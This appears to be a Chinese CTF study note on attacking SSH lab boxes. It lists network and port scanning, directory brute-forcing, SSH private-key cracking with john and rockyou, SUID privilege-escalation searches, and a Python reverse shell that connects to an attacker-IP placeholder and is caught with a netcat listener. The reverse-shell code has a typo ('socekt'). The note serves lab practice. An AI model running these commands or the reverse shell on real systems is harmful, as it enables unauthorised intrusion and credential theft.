CTF-SSH

CTF-SSH(笔记+总结)

思路:对网络进行扫描,寻找可疑主机,对目标主机进行端口扫描,特别注意大端口和特殊端口,在端口中寻找关键文件、可疑文件,注意id_rsa,远程登录目标主机,判断获取用户类型,进行提权最终获取root用户,获取flag。

netdiscover -r ip/netmask
nmap -sV ip
nmap -A -v ip
nmap -O ip
dirb http://ip:端口
nikto -host ip
ssh -i id_rsa 用户名@ip
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > rsacrack
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
find / -perm -4000 2>/dev/null
netstat -pantu
nc -lvp 4445
git clone https://github.com/jeanphorn/common-password.git
./cupp.py -i
python -c "import pty;pty.spawn('/bin/bash')"
 
反弹shell
靶场代码
#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("攻击机ip","攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])

攻击机netcat命令
	nc -lvp 未占用端口(要一致攻击机监听端口)
查看占用端口 netstat -pantu

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值